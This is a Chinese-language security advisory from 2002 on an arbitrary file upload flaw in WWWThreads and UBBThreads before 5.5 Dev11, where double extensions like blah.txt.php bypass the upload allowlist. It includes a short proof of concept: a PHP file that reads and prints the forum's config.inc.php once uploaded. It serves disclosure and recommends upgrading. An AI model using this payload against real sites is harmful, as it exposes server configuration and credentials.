WWWThreads, UBBThreads存在任意文件可上载漏洞发布时间:2002-01-31 更新时间:2002-01-31 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 WWWThreads 和 UBBThreads 5.5 Dev11 之前版本详细描述 WWWThreads, UBBThreads是流行的PHP编写的BBS系统。 其中有config.inc.php 定义何种文件可上传,如: ..: config.inc.php :.. ------------------------- snip ------------------------------ // $config['excludefiles'] = ".php,.asp,.js,.vbs,.sht,.htm"; $config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp"; ------------------------- snip ------------------------------ 不过存在漏洞可以导致不在allowfile规定的文件也可以上载,问题存在于没有很 好的检查扩展名,如果远程用户首先放置允许的扩展名随后增加不允许的扩展名, 就可以导致程序允许程序被上载,如blah.txt.php就允许上载。 测试代码 1)建立一个blah.txt.php文件: $ touch blah.txt.php 2)编辑文件$ vi blah.txt.php 如: <?php $readfile = join("", file ("../config.inc.php")); print $readfile; ?> 上载文件。 这样就可以导致远程用户可以查看config.inc的内容。 解决方案 请尽快升级程序到ubbthreads 5.5: http://www.infopop.com/ 相关信息 Root Extractor (condor@phreaker.net) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-01/0364.html |
